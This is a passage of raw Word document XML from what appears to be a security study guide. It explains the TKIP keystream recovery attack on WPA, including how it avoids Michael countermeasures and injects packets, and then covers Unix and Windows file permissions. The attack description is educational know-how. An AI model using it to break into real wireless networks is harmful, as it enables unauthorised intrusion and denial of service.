          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TKIP is vulnerable to a keystream recovery attack that, if successfully executed, permits an attacker to transmit 7-15 packets of the attacker's choice on the network. The attack is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an extension of the WEP chop-chop attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because WEP utilizes a cryptographically insecure checksum mechanism (CRC32), an attacker can guess individual bytes of a packet, and the wireless access point will confirm or deny whether or not the guess is correct. If the guess is correct, the attacker will be able to detect the guess is correct and continue to guess other bytes of the packet. However, unlike the chop-chop attack against a WEP network, the attacker must wait for at least 60 seconds after a correct guess (a successful circumvention of the CRC32 mechanism) before continuing the attack. This is because although TKIP continues to use the CRC32 checksum mechanism, it implements an additional MIC code named Michael. If two incorrect Michael MIC codes are received within 60 seconds, the access point will implement countermeasures, meaning it will rekey the TKIP session key, thus changing future keystreams. Accordingly, TKIP attack will wait an appropriate amount of time to avoid these countermeasures. Because ARP packets are easily identified by their size, and the vast majority of the contents of this packet would be known to an attacker, the number of bytes an attacker must guess using the above method is rather small (approximately 14 bytes). </w:t>
      </w:r>
      <w:r w:rsidR="003071E1" w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ecovery of 12 bytes is possible in about 12 minutes on a typical network.</w:t>
      </w:r>
      <w:r w:rsidR="003071E1" w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An attacker already has access to the entire ciphertext packet. Upon retrieving the entire plaintext of the same packet, the attacker has access to the keystream of the packet, as well as the MIC code of the session. Using this information the attacker can construct a new packet and transmit it on the network. To circumvent the WPA implemented replay protection, attack utilizes QoS channels to transmit these newly constructed packets. An attacker able to transmit these packets may be able to implement any number of attacks, including ARP poisoning attacks, denial of service, and other similar attacks.</w:t>
      </w:r>
      <w:r w:rsidR="003071E1" w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">urther </w:t>
      </w:r>
      <w:r w:rsidR="003071E1" w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>refinements on the attack have been made,</w:t>
      </w:r>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabling attackers to inject a larger malicious packet (596 bytes, to be more specific) within approximately 18 minutes and 25 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B13 - File System Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRDefault="008876A5" w:rsidP="002E1750">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B13a - File permission attributes within </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Windows file systems and their security implications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00F65891" w:rsidRDefault="00576AAB" w:rsidP="0066782A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:t>Unix File permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00F65891" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00200132" w:rsidRPr="00F65891" w:rsidRDefault="00D55866" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions on Unix-like systems are managed in three distinct classes known as user, group, and others. </w:t>
      </w:r>
      <w:r w:rsidR="00DE5833" w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00200132" w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Effective permission on a file or directory is based on the accessing user’s class:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200132" w:rsidRPr="00F65891" w:rsidRDefault="00200132" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Files and directories are owned by a user. The owner determines the file's owner class. </w:t>
      </w:r>
      <w:r w:rsidR="00DE5833" w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Normally files </w:t>
      </w:r>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">or directories </w:t>
      </w:r>
      <w:r w:rsidR="00DE5833" w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>are owned by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ir creator. Distinct permissions are applied to the owner of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200132" w:rsidRPr="00F65891" w:rsidRDefault="00200132" w:rsidP="00200132">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE5833" w:rsidRPr="00F65891" w:rsidRDefault="00200132" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Files and directories are assigned a group, which define the file's group class. Distinct permissions apply to members of the file's group members. The owner need not be a member of the file's group. Group membership on a system is defined by /etc/group configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200132" w:rsidRPr="00F65891" w:rsidRDefault="00200132" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Users who are not the owner, nor a member of the group, comprise a file's others class. Distinct permissions apply to others.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F65891" w:rsidRPr="00F65891" w:rsidRDefault="00F65891" w:rsidP="00F65891">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21B14" w:rsidRPr="00F65891" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The following specific permissions on Unix-like sy</w:t>
      </w:r>
      <w:r w:rsidR="00F65891" w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stems that apply to each class:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B14" w:rsidRPr="00F65891" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Read permission - grants the ability to read a file. When set for a directory, this permission grants the ability to read the names of files in the directory (but not to find out any further information about them such as contents, file type, size, ownership, permissions, etc.). Read is denoted by ‘r’ (or 4 in octal notation). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B14" w:rsidRPr="00F65891" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Write permission - grants the ability to modify a file. When set for a directory, this permission grants the ability to modify entries in the directory. This includes creating files, deleting files, and renaming files. Write is denoted by ‘w’ (or 2 in octal notation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00200132" w:rsidRPr="00F65891" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65891">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute permission - grants the ability to execute a file. This permission must be set for executable binaries or shell scripts in order to allow the operating system to run them. When set for a directory, this permission grants the ability to traverse its tree in order to access files or subdirectories, but not see files inside the directory (unless read is set). Execute is denoted by ‘x’ (or 1 in octal notation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B14" w:rsidRDefault="00E21B14" w:rsidP="00200132"/>
    <w:p w:rsidR="00E21B14" w:rsidRPr="003578F7" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The following special permission can also apply</w:t>
      </w:r>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F65891" w:rsidRPr="003578F7" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Setuid permission </w:t>
      </w:r>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">When applied to an executable the program runs with the effective permission of the file owner. When applied to a directory setuid is ignored on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Linux systems. However, on FreeBSD it can cause all files created within the directory to be created with the owner set to the top directory owner (an obvious security hole can which can be disabled in the kernel and needs to be explicitly permitted in the mount options)</w:t>
      </w:r>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etuid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is denoted by ‘s’ for executable or ‘S’ for directory (or 4000</w:t>
      </w:r>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in octal notation) and is only applicable to the owner class. Setuid on shell scripts is ignored by many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems and can still present a security risk to poorly designed executables. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B14" w:rsidRPr="003578F7" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Setgid permission</w:t>
      </w:r>
      <w:r w:rsidR="00F65891" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The setgid attribute will allow for changing the group based privileges within a process, like the setuid flag does for user based privileges. Setting the setgid permission on a directory causes new files and subdirectories created within it to inherit its groupID, rather than the primary groupID of the user who created the file. Newly created subdirectories inherit the setgid bit. Setgid is denoted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>by ‘s’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for executable or ‘S’ for directory (or 2000 in octal notation) and is only applicable to the group class.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B14" w:rsidRDefault="00E21B14" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sticky bit permission </w:t>
      </w:r>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">originally used for </w:t>
      </w:r>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pure executable files. When set, it instructed the operating system to retain the text segment of the program in swap space after the process exited. This sped up subsequent executions by allowing the kernel to make a single operation of moving the program from swap to real memory. </w:t>
      </w:r>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>However, this feature is been dropped from most modern system.  Nowadays, t</w:t>
      </w:r>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">he most common use of the sticky bit today is on directories. When the sticky bit is set, only the item's owner, the directory's owner, or the superuser can rename or delete files. Without the sticky bit set, any user with write and execute permissions for the directory can rename or delete contained files, regardless of owner. Typically this is set on </w:t>
      </w:r>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the /tmp directory to prevent ordinary users from deleting or moving other users' files. </w:t>
      </w:r>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D8566D" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The sticky bit is also set by the automounter to indicate that a file has not been mounted yet. This allows programs like ls to ignore unmounted remote files.</w:t>
      </w:r>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sticky is denoted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>by ‘t’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for files or ‘T’ for directories (or 1000 in octal notation) and is only applicable to the other class</w:t>
      </w:r>
      <w:r w:rsidR="003578F7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02CF5" w:rsidRPr="00D06E2C" w:rsidRDefault="00DE5833" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The umask </w:t>
      </w:r>
      <w:r w:rsidR="003578F7" w:rsidRPr="003578F7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">defines the permission creation mask and limits the permission modes for files and directories subsequently created by the process. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7787" w:rsidRDefault="00576AAB" w:rsidP="00C92D70">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Windows File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B7787" w:rsidRPr="00B665F9" w:rsidRDefault="006B7787" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92D70">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>All named objects in Windows have security descriptors, which provide information about their owner as well as list which users and subjects have specified permissions (DACLS). They also can specify which object accesses must be logged to the system event log.  The information about what a subject (user, process, etc) is allowed to do to an object is specified in a data structure known as an ACL. ACLs enumerate who has what kind of access to specific objects. A discretionary ACL (DACL) is a type of ACL where the owners of objects are allowed to change them. Whenever an object is accessed, the security descriptor is compared to the principal's permissions to verify that the requested access is allowed. Windows also supports system ACLs (SACLs) for objects and has used SACL settings to establish which events are logged to the audit log.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B665F9" w:rsidRPr="00B665F9" w:rsidRDefault="006B7787" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C92D70">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows relies on DACLs for general access-control decisions. For the system to determine whether a principal is allowed to perform an operation upon an object, several things are checked: the principal's privileges, the principal's token, and the object's security descriptor. The binary security descriptor on an object is passed to the AccessCheck routine with the principal's token. If the requested access is satisfied by the principal's privileges, access is granted. Otherwise, the DACL access control entries (ACEs) are examined in order. As soon as the security system is able to show that all requested access components are allowed or that any of them is denied, it returns a success in the former case and a failure in the latter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B665F9" w:rsidRPr="00B665F9" w:rsidRDefault="00B665F9" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B665F9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An ACL with no ACEs in it is an empty DACL. Since an ACE grants a specified subject access to an object, no one can access an object with an empty DACL. An object without a DACL is said to have a NULL DACL. Objects with NULL DACLs have not been secured and everybody has full control over them. For that reason, do not set either empty or NULL DACLs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756ED0" w:rsidRPr="00C92D70" w:rsidRDefault="00756ED0" w:rsidP="006B7787">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B665F9" w:rsidRPr="00B665F9" w:rsidRDefault="00D06E2C" w:rsidP="00A66CDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Windows file permission settings</w:t>
      </w:r>
      <w:r w:rsidR="00A66CDC" w:rsidRPr="00C92D70">
        <w:rPr>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Full Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="008A277C" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Everything</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Traverse Folder / Execute File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7291" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B665F9" w:rsidRPr="008A277C" w:rsidRDefault="00B665F9" w:rsidP="00B665F9">
            <w:pPr>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008A277C">
              <w:rPr>
